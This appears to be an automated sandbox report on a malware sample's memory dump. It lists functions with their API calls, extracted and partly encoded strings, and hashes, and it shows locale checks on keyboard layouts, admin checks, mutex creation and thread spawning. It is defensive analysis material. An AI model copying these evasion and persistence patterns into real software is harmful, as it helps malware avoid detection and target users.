Opcode Fuzzy Hash: 14c807a3a0139cd875422f88ef81b20bb6fccbb6df46bfbc14d8ac682f71a4ec
Instruction Fuzzy Hash: 76D13A70E00604A7DB14BB28DD4A39E7A71AF81314F5442AEE4457B3C2EB785E858BCB

Function 00405DF0 Relevance: 19.6, APIs: 6, Strings: 5, Instructions: 334
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 00405E23
RegCloseKey.ADVAPI32(80000001), ref: 00405E5A

Strings

00000423, xrefs: 0040600A
Keyboard Layout\Preload, xrefs: 00405F64
00000422, xrefs: 00405FD9
0000043f, xrefs: 0040603B
00000419, xrefs: 00405FA8

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: CloseOpen
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 47109696-3963862150
Opcode ID: bbc2f187c8eed740b55ad22dcae9e591980b19e15b42e22170e055a691e32fd0
Instruction ID: 4877af6237dc152a961cabe89cf48ce294cb648326b51ba012abf8f768f770e2
Opcode Fuzzy Hash: bbc2f187c8eed740b55ad22dcae9e591980b19e15b42e22170e055a691e32fd0
Instruction Fuzzy Hash: 6DD1B0719002189BEB24DF54CC84BDEB779EB05304F5042E9F409E72D2DB789AE88F98

Function 00442447 Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 373
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 004424C9
_free.LIBCMT ref: 004424ED
_free.LIBCMT ref: 0044267A
GetTimeZoneInformation.KERNELBASE(?,00000000,00000000,00000000,?,00456758), ref: 0044268C
_free.LIBCMT ref: 00442846

Strings

Eastern Standard Time, xrefs: 004426FB
E(D, xrefs: 00442635, 00442750, 0044263B
Eastern Summer Time, xrefs: 0044272A

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID: E(D$Eastern Standard Time$Eastern Summer Time
API String ID: 597776487-60808567
Opcode ID: b5c1d0aa1d305d627ecdab0ec696a7e662278e3e5e6446c854b0c2a074998c20
Instruction ID: 8a2ad7c8ddb88666a8a80ac310e7c52cb4a3d9176fa67102464be6fe7cd5fa65
Opcode Fuzzy Hash: b5c1d0aa1d305d627ecdab0ec696a7e662278e3e5e6446c854b0c2a074998c20
Instruction Fuzzy Hash: CFC15A71900205ABEB14AF298E51AAABBB9EF45314F9401AFF44097382E7BC9E41C75D

Function 004064F0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 253
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameA.ADVAPI32(?,?), ref: 0040654A
LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 00406590
GetSidIdentifierAuthority.ADVAPI32(?), ref: 0040659D
GetSidSubAuthorityCount.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004066B1
GetSidSubAuthority.ADVAPI32(?,00000000), ref: 004066D8

Strings

HI1ngO==, xrefs: 00406638
JIVngO==, xrefs: 004066E1
So0geFUu, xrefs: 004065AC

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Authority$Name$AccountCountIdentifierLookupUser
String ID: HI1ngO==$JIVngO==$So0geFUu
API String ID: 4230999276-2420281365
Opcode ID: a06baf0dc776813748b712d38d245c5a1bdf30dc835b5986c4f375a2e31fbfee
Instruction ID: ec8202c6b021b4f6da73c36fd7bb26256ff81a187fcf59854b67d706fd1a4f0c
Opcode Fuzzy Hash: a06baf0dc776813748b712d38d245c5a1bdf30dc835b5986c4f375a2e31fbfee
Instruction Fuzzy Hash: B891E6B19001189BDB28DF68CC85BDDB779EB45304F4045FEE509A72C2DA799BC48F68

Function 0040B860 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 130
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000), ref: 0040B8C7
CoCreateInstance.OLE32(00459010,00000000,00000001,00459020,?), ref: 0040B8E3
CoUninitialize.OLE32 ref: 0040B8F1
CoUninitialize.OLE32 ref: 0040B9B0
CoUninitialize.OLE32 ref: 0040B9C4

Strings

Su9OYy==, xrefs: 0040BD73
9xRVfBowNz==, xrefs: 0040C22B, 0040C483
9xRVfFM7NB4=, xrefs: 0040C2C5

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Uninitialize$CreateInitializeInstance
String ID: 9xRVfBowNz==$9xRVfFM7NB4=$Su9OYy==
API String ID: 1968832861-241798761
Opcode ID: 7a41a3980ae37c772f8e29b05a17160b9f51f67f45480db1b4ad45ddcd132af8
Instruction ID: e7d39e8b4048d791aff7efdc36e91ae20f316ae18b56e236f831324a7e3c3bc1
Opcode Fuzzy Hash: 7a41a3980ae37c772f8e29b05a17160b9f51f67f45480db1b4ad45ddcd132af8
Instruction Fuzzy Hash: 87417271A00209DFDB04DF69CC49BAE77B9EF48715F10812AF905E72D1D778A940CB99

Function 006F003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006F024D

Strings

kernel32.dll, xrefs: 006F008F, 006F0095
cess, xrefs: 006F018D

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 0678014ce6f49d3bf84ccf4f85035769bc91b8cec820bc5812adc689efd3fec3
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 46525974A01229DFDB64CF58C985BA8BBB1BF09304F1480D9E94DAB352DB30AE95DF14

Function 00442622 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 171
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTimeZoneInformation.KERNELBASE(?,00000000,00000000,00000000,?,00456758), ref: 0044268C
_free.LIBCMT ref: 0044267A

Part of subcall function 0043AD25: HeapFree.KERNEL32(00000000,00000000,?,0043EFFD,?,00000000,?,8B18EC83,?,0043F024,?,00000007,?,?,0043F426,?), ref: 0043AD3B
Part of subcall function 0043AD25: GetLastError.KERNEL32(?,?,0043EFFD,?,00000000,?,8B18EC83,?,0043F024,?,00000007,?,?,0043F426,?,?), ref: 0043AD4D

_free.LIBCMT ref: 00442846

Strings

Eastern Standard Time, xrefs: 004426FB
E(D, xrefs: 00442635, 00442750, 0044263B
Eastern Summer Time, xrefs: 0044272A

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapInformationLastTimeZone
String ID: E(D$Eastern Standard Time$Eastern Summer Time
API String ID: 2155170405-60808567
Opcode ID: 3f3760002a74bcd632fa05c6f7018d6c020e516b8c8f5926dcac9eb964288e9a
Instruction ID: 522402505c5bfa044af04196535c13d1f65720787a9ee6b81a006049149adbff
Opcode Fuzzy Hash: 3f3760002a74bcd632fa05c6f7018d6c020e516b8c8f5926dcac9eb964288e9a
Instruction Fuzzy Hash: 1B51FB71900209ABEB10EF66DD819AEB7B8EF44314F51026FF514A3291EBF89D41CB5D

Function 004081F0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 155
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(0000011C,?,B007A738), ref: 00408269
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004082D0
GetProcAddress.KERNEL32(00000000), ref: 004082D7
GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408394

Strings

0B|, xrefs: 004082AF

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: AddressHandleInfoModuleNativeProcSystemVersion
String ID: 0B|
API String ID: 2167034304-1087777810
Opcode ID: f659fa4f52ca0a6b650695086c22bc795bbc26ae14587ab0cb5da33b0312b958
Instruction ID: 2b52060881cdc01c7422ec2d016a957ccd6584bd44f59e815f8f4d859b1dac4c
Opcode Fuzzy Hash: f659fa4f52ca0a6b650695086c22bc795bbc26ae14587ab0cb5da33b0312b958
Instruction Fuzzy Hash: 59512970D002049BDB14EB68DE497DDB775EB85714F5042BEE848A73C1EF399A808B99

Function 004093F0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 229
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,B007A738,00000000,00000000), ref: 0040943F

Strings

`H|, xrefs: 0040A7E0, 0040A7EC
hT,F, xrefs: 004098A5
, xrefs: 004098D2
Vq==, xrefs: 004094C5

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: FileModuleName
String ID: Vq==$`H|$hT,F$
API String ID: 514040917-3763631131
Opcode ID: 9bda987e0f59e51e19124d42c98477264a636b2be7d10c8e3bebd0db3453faba
Instruction ID: d3722d9b61af259e8ac3333f60a2498251bc52281e75136278e01401dac3c9ba
Opcode Fuzzy Hash: 9bda987e0f59e51e19124d42c98477264a636b2be7d10c8e3bebd0db3453faba
Instruction Fuzzy Hash: A291C171A001189BDB29DF28CD85BDDB775EB85304F1081EEE40CA7292DB799EC58F84

Function 0040A7D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064,?), ref: 0040A7D3
CreateMutexA.KERNELBASE(00000000,00000000,`H|), ref: 0040A7F1
GetLastError.KERNEL32 ref: 0040A7F9
GetLastError.KERNEL32 ref: 0040A80A

Strings

`H|, xrefs: 0040A7E0, 0040A7EC

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: ErrorLast$CreateMutexSleep
String ID: `H|
API String ID: 3645482037-3599100456
Opcode ID: d0e2b8b080f1cc7f9959afcc113a4a57c75906a2d8f1ef9ad8eac5ad466f17bc
Instruction ID: cd6b469e39a56f414f10b16126625ebb185d9045f7363f206df86517658ac1d8
Opcode Fuzzy Hash: d0e2b8b080f1cc7f9959afcc113a4a57c75906a2d8f1ef9ad8eac5ad466f17bc
Instruction Fuzzy Hash: 1BE0DF35240300EBE3402B68BC5CB0A32A5D7C4B13F20883AF209C62E1C778CC808B1F

Function 00436E71 Relevance: 7.6, APIs: 5, Instructions: 141
pipeCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00436E93
GetFileInformationByHandle.KERNELBASE(?,?), ref: 00436EED
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00436DA3,?,000000FF), ref: 00436F7B
__dosmaperr.LIBCMT ref: 00436F82
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00436FBF

Part of subcall function 004371E7: __dosmaperr.LIBCMT ref: 0043721C

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 1206951868-0
Opcode ID: 5b9242c7ae0e0581c611ac09111ea73bc8d37d8f715f3890c66e5f61f0e3e050
Instruction ID: 713bdfeaf1d5cd3a9a6724314531c93a0b5a9354d0d37a081fe2ddba32240612
Opcode Fuzzy Hash: 5b9242c7ae0e0581c611ac09111ea73bc8d37d8f715f3890c66e5f61f0e3e050
Instruction Fuzzy Hash: 18416D75900605AFDB24DFA6EC459AFBBF9EF48304B01942EF556D3210EA389804CB65

Function 00416CD0 Relevance: 6.0, APIs: 4, Instructions: 37
threadsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040A7D0: Sleep.KERNELBASE(00000064,?), ref: 0040A7D3
Part of subcall function 0040A7D0: CreateMutexA.KERNELBASE(00000000,00000000,`H|), ref: 0040A7F1
Part of subcall function 0040A7D0: GetLastError.KERNEL32 ref: 0040A7F9
Part of subcall function 0040A7D0: GetLastError.KERNEL32 ref: 0040A80A

Part of subcall function 00414E20: IsUserAnAdmin.SHELL32 ref: 00414F77

Part of subcall function 00405DF0: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,80000001,0000043f,00000008,00000423,00000008,00000422,00000008,00000419,00000008), ref: 0040608D

CreateThread.KERNELBASE(00000000,00000000,Function_00016AD0,00000000,00000000,00000000), ref: 00416C96
CreateThread.KERNELBASE(00000000,00000000,Function_00016B60,00000000,00000000,00000000), ref: 00416CA7
CreateThread.KERNELBASE(00000000,00000000,Function_00016BF0,00000000,00000000,00000000), ref: 00416CB8
Sleep.KERNELBASE(00007530), ref: 00416CC5

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Create$Thread$ErrorLastSleep$AdminMutexOpenUser
String ID:
API String ID: 3900192540-0
Opcode ID: 30aadc198e94ba4c63568fdfabcec14110782b1442d63bd446ab3f4a797acdad
Instruction ID: df55d08362bcf096fff0de3a4be89024fb4cfd1db5ec3a3146fab47a76e5f0ce
Opcode Fuzzy Hash: 30aadc198e94ba4c63568fdfabcec14110782b1442d63bd446ab3f4a797acdad
Instruction Fuzzy Hash: 26F03235BE832871F23032A61C03F8A29188B04F65F31002BB3083E0D298D8B48086EF

Function 0044277D Relevance: 4.6, APIs: 3, Instructions: 79COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004427F0
_free.LIBCMT ref: 00442846

Part of subcall function 00442622: _free.LIBCMT ref: 0044267A
Part of subcall function 00442622: GetTimeZoneInformation.KERNELBASE(?,00000000,00000000,00000000,?,00456758), ref: 0044268C

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID:
API String ID: 597776487-0
Opcode ID: 13dff872d4da3940e7f7c2aad926b40bfead4e65e52a482af211b715217b11d5
Instruction ID: 77eed7bb9b31f603c873465ef00f14ae4341fd887b7b294a8b9d26300fc5fe07
Opcode Fuzzy Hash: 13dff872d4da3940e7f7c2aad926b40bfead4e65e52a482af211b715217b11d5
Instruction Fuzzy Hash: 3921293180011867E73077258E41EEF73789B85368F5103ABF495B2191EEFC5D82855E

Function 0040D520 Relevance: 3.3, APIs: 2, Instructions: 344COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040D763
CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?,?), ref: 0040D87F

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: CreateDirectoryFileModuleName
String ID:
API String ID: 3341437400-0
Opcode ID: 53f1349ed916593c7f6e99b0ecf011b9e2d01099296081a024b97d1864a90839
Instruction ID: bac6768fe32faa16b787cff59dfcbf022d8245fcb64040a96dc78cd8dd86c807
Opcode Fuzzy Hash: 53f1349ed916593c7f6e99b0ecf011b9e2d01099296081a024b97d1864a90839
Instruction Fuzzy Hash: 0AD1E0B1D002189BEB14EB68CD497DDBB71AB46304F5041EEE448B72C2DB795BC8CB95

Function 00436D09 Relevance: 3.1, APIs: 2, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a35bac2bf52e979d8baf0822f558ed8fe93b93593df02814baed48deed707c66
Instruction ID: c9b45ac5b67ed5ac673cd062dd78ef12dcc4cad0d37c1cc290fadc12a3f424e3
Opcode Fuzzy Hash: a35bac2bf52e979d8baf0822f558ed8fe93b93593df02814baed48deed707c66
Instruction Fuzzy Hash: CC216D71A00209BBEB106B65DC42B9F3728DF4533CF214316F9602B2D1D778AD0186A9

Function 00436FE1 Relevance: 3.1, APIs: 2, Instructions: 54timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(00000000,?,?,?,?,00436F18,?,?,00000000,00000000), ref: 0043700F
SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?,?,?,?,00436F18,?,?,00000000,00000000), ref: 00437023

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Time$System$FileLocalSpecific
String ID:
API String ID: 1707611234-0
Opcode ID: 8298bbf10895cd01c4960c57ef31bed2cf3fa0d0b6bd1f945562adba26ccaa03
Instruction ID: f7d0f46f9ed99af059c3d5d65e11da7fe97a40d7f05f1488114d3cbf374ff35e
Opcode Fuzzy Hash: 8298bbf10895cd01c4960c57ef31bed2cf3fa0d0b6bd1f945562adba26ccaa03
Instruction Fuzzy Hash: 89111FB290410DABCF15DFA5C984EDF77BCAB0C324F105267E552E2180E734EA44CB65

Function 0078476E Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00784796
Module32First.KERNEL32(00000000,00000224), ref: 007847B6

Memory Dump Source

Source File: 00000015.00000002.4556167209.0000000000783000.00000040.00000020.00020000.00000000.sdmp, Offset: 00783000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_783000_Hkbsse.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 38748d1b1986117efad751e1b507520bda7f9c40eb5aa1ba514053b2c4727550
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: E0F09632240722BBD7203BF5AC8DB6EB6ECEF4A725F100528E646910C0DBF8EC454B61

Function 00416B60 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE ref: 00416BE5

Strings

p>|, xrefs: 00416B9D

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: p>|
API String ID: 3472027048-3016136488
Opcode ID: 979464a90368912ca901fc9759ca72443b94bd2e1ddb644159e455381b6ee6ec
Instruction ID: 51643b778cb04a08f33f4dc99d6f2aafd66632f72b24d0b5d8108c8e0ec688f1
Opcode Fuzzy Hash: 979464a90368912ca901fc9759ca72443b94bd2e1ddb644159e455381b6ee6ec
Instruction Fuzzy Hash: FBF0D671A00514A7C7007B699D1774E7B74E746B24F90025EE410672D1E6786A0487DB

Function 00416BF0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE ref: 00416C75

Strings

x@|, xrefs: 00416C2D

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: x@|
API String ID: 3472027048-208245480
Opcode ID: 2985a79b2112d108e0c096931f069456f93d0814801c715209a079cfc9a4d0a9
Instruction ID: 35c428a7eb5981938d79263241aedc48875a8237b928f93064c340b0e5b75b40
Opcode Fuzzy Hash: 2985a79b2112d108e0c096931f069456f93d0814801c715209a079cfc9a4d0a9
Instruction Fuzzy Hash: 74F0F971A00914B7C7007B6DDD0774E7B75E746B24F90035EE810272D1E7B8290487DB

Function 006F0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000400,?,?,006F0223,?,?), ref: 006F0E19
SetErrorMode.KERNELBASE(00000000,?,?,006F0223,?,?), ref: 006F0E1E

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: d8c2787c6b6fc2ad39057b91f40ad61ca30c10889ca22b6d10a9e69a26420dec
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 9ED0123154512CB7D7002A94DC09BDD7B1CDF05B62F008411FB0DD9181C770994046E5

Function 00409A15 Relevance: 1.6, APIs: 1, Instructions: 114sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 00409A18
Sleep.KERNELBASE(00000064,?), ref: 0040A7D3
CreateMutexA.KERNELBASE(00000000,00000000,`H|), ref: 0040A7F1
GetLastError.KERNEL32 ref: 0040A7F9
GetLastError.KERNEL32 ref: 0040A80A

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: ErrorLast$AttributesCreateFileMutexSleep
String ID:
API String ID: 2742703886-0
Opcode ID: 091349c4b08bd7451c22bb90495be507a9a5881c019c3de7ed4923691bb49e8e
Instruction ID: fe103c87303a8d5375aa245c4279ff913cf7d8258ac3f3006201dc8a17fdb926
Opcode Fuzzy Hash: 091349c4b08bd7451c22bb90495be507a9a5881c019c3de7ed4923691bb49e8e
Instruction Fuzzy Hash: 00312671B001448BDB08DB78D9887ADBB72AB86314F20822EE414B73D2D77E99808B59

Function 00409B4A Relevance: 1.6, APIs: 1, Instructions: 113sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 00409B4D
Sleep.KERNELBASE(00000064,?), ref: 0040A7D3
CreateMutexA.KERNELBASE(00000000,00000000,`H|), ref: 0040A7F1
GetLastError.KERNEL32 ref: 0040A7F9
GetLastError.KERNEL32 ref: 0040A80A

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: ErrorLast$AttributesCreateFileMutexSleep
String ID:
API String ID: 2742703886-0
Opcode ID: 66e9a3bfd0e486ad76a0e272b8f466acefbb5c8df5b39d5b2d1d237e18203327
Instruction ID: 80e4e89fe9751b19850e2af68636f56c74f137eecdc0e25c172621ba01e6e5a7
Opcode Fuzzy Hash: 66e9a3bfd0e486ad76a0e272b8f466acefbb5c8df5b39d5b2d1d237e18203327
Instruction Fuzzy Hash: D3310A71A002448BEB08DB78DD8979DBB72EB86324F20832EE054B73D6D77D99908759

Function 00409DB4 Relevance: 1.6, APIs: 1, Instructions: 111sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 00409DB7
Sleep.KERNELBASE(00000064,?), ref: 0040A7D3
CreateMutexA.KERNELBASE(00000000,00000000,`H|), ref: 0040A7F1
GetLastError.KERNEL32 ref: 0040A7F9
GetLastError.KERNEL32 ref: 0040A80A

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: ErrorLast$AttributesCreateFileMutexSleep
String ID:
API String ID: 2742703886-0
Opcode ID: 4f9743b1b96ef363ec3504914080dc49602b5a9c01caf3067c702a2486c44cb5
Instruction ID: c284722c0f70f196bbe95672319c59f935b25b9f0a6050a217ddc806a3a54874
Opcode Fuzzy Hash: 4f9743b1b96ef363ec3504914080dc49602b5a9c01caf3067c702a2486c44cb5
Instruction Fuzzy Hash: DE313BB16002448BEB08CB78DD8979DBB72EF86314F20862EE054B73D6D77D9D808759

Function 00409EE9 Relevance: 1.6, APIs: 1, Instructions: 110sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 00409EEC
Sleep.KERNELBASE(00000064,?), ref: 0040A7D3
CreateMutexA.KERNELBASE(00000000,00000000,`H|), ref: 0040A7F1
GetLastError.KERNEL32 ref: 0040A7F9
GetLastError.KERNEL32 ref: 0040A80A

Memory Dump Source

